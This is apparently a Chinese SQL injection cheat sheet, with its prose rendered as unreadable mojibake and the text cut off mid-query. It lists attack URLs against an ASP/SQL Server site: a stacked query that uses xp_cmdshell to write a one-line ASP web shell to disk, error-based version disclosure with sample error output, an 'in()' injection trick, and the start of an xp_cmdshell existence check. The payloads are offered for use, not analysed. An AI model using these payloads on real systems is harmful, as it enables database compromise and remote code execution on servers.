×îÏêϸµÄSQL×¢ÈëÓï¾ä

×îÏêϸµÄSQL×¢ÈëÓï¾äÏà¹ØµÄÃüÁîÕûÀí
1¡¢    ÓÃ^תÒå×Ö·ûÀ´Ð´ASP(Ò»¾ä»°Ä¾Âí)ÎļþµÄ·½·¨:
   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
    echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2¡¢    ÏÔʾSQLϵͳ°æ±¾£º
   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript ±àÒëÆ÷´íÎó ´íÎó '800a03f6'
ȱÉÙ 'End'
/iisHelp/common/500-100.asp£¬ÐÐ242
Microsoft OLE DB Provider for ODBC Drivers ´íÎó '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp£¬ÐÐ17
3¡¢    ÔÚ¼ì²âË÷ÄáÖйúµÄÍøվ©¶´Ê±£¬·ÖÃ÷ÒѾ­È·¶¨ÁË©¶´´æÔÚÈ´ÎÞ·¨ÔÚÕâÈýÖÖ©¶´ÖÐÕÒµ½¶ÔÓ¦µÄÀàÐÍ¡£Å¼È»¼äÎÒÏëµ½ÁËÔÚSQLÓïÑÔÖпÉÒÔʹÓÓin”¹Ø¼ü×Ö½øÐвéѯ£¬ÀýÈç“select * from mytable where id in(1)”£¬À¨ºÅÖеÄÖµ¾ÍÊÇÎÒÃÇÌá½»µÄÊý¾Ý£¬ËüµÄ½á¹ûÓëʹÓÓselect * from mytable where id=1”µÄ²éѯ½á¹ûÍêÈ«Ïàͬ¡£ËùÒÔ·ÃÎÊÒ³ÃæµÄʱºòÔÚURLºóÃæ¼ÓÉÏ“) and 1=1 and 1 in(1”ºóÔ­À´µÄSQLÓï¾ä¾Í±ä³ÉÁË“select * from mytable where id in(1) and 1=1 and 1 in(1)”£¬ÕâÑù¾Í»á³öÏÖÆÚ´ýÒѾõÄÒ³ÃæÁË¡£ÔÝÇҾͽÐÕâÖÖÀàÐ͵Ä©¶´Îª“°üº¬Êý×ÖÐÍ”°É£¬´ÏÃ÷µÄÄãÒ»¶¨Ïëµ½ÁË»¹ÓГ°üº¬×Ö·ûÐÍ”ÄØ¡£¶ÔÁË£¬Ëü¾ÍÊÇÓÉÓÚÀàËÆ“select * from mytable where name in(‘firstsee’)”µÄ²éѯÓï¾äÔì³ÉµÄ¡£
4¡¢    ÅжÏxp_cmdshellÀ©Õ¹´æ´¢¹ý³ÌÊÇ·ñ´æÔÚ£º
http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) from master.dbo.sysobjects WHERE xtyp